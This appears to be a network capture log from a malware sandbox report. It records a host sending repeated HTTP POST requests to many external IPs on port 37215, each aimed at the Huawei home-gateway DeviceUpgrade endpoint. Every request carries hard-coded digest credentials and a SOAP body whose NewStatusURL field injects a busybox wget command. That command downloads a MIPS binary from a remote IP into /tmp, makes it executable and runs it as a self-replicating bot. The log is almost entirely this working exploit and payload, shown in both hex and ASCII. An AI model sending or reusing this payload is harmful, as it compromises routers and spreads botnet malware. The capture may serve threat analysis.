                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1288192.168.2.134347834.114.216.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451183081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1289192.168.2.1353970157.210.192.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451239109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1290192.168.2.134811241.186.3.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451260090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1291192.168.2.1346836157.32.222.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451303005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1292192.168.2.1335404197.201.169.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451910973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1293192.168.2.1359602197.122.169.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.451924086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1294192.168.2.1360730101.250.236.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452009916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1295192.168.2.1345422197.83.141.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452617884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1296192.168.2.1360048197.1.96.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452629089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1297192.168.2.134644441.2.170.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.452640057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 